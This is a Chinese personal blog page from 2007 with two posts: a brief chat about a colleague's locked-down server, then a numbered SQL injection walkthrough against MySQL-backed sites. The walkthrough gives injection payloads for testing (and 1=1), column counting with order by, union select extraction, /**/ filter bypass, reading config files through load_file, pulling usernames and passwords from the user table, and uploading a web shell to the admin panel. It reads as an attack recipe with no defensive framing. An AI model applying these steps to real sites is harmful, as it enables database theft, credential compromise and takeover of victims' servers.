博文

去杂留-精
posts - 2, comments - 0, trackbacks - 0, articles - 0
  PHP博客 :: 首页 :: 新随笔 :: 联系 :: 聚合  :: 管理

2007年3月28日

昨天加班的时候和同事聊起了服务器的问题,他告诉我他的服务器的安全设置情况如下:

  VPN服务

 FTP服务

 WEB服务

 3389服务

就开了这些服务~!而且都设置了特定的安全策略,WEB服务暂时没有放置站点.除了FTP可以通过外网端口连接以外,其他都需要VPN连接后,才能启用~!够BT吧~!顺便找他要了4G的FTP空间放点东西!


文章来源:http://fengjing.skpay.net/tuf/default.asp?id=14

posted @ 2007-03-28 20:16 博文 阅读(220) | 评论 (0)编辑 收藏

2007年3月6日

1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。
6. 如果返回正常,则可以通过and 1=2 union select 1,2,3,4,5,6,load_file(char(文件路径的ascii值,用逗号隔开)),8,9,10 /* 注:load_file(char(文件路径的ascii值,用逗号隔开))也可以用十六进制,通过这种方式读取配置文件,找到数据库连接等。
7.首先猜解user表,如: and 1=2 union select 1,2,3,4,5,6.... from user /* 如果返回正常,说明存在这个表。
8.知道了表就猜解字段,and 1=2 union select 1,username,3,4,5,6.... from user/*如果在2字段显示出字段内容则存在些字段。
9.同理再猜解password字段,猜解成功再找后台登录。
10.登录后台,上传shell。

文章来源:http://fengjing.skpay.net/tuf/default.asp?id=7

posted @ 2007-03-06 21:44 博文 阅读(900) | 评论 (0)编辑 收藏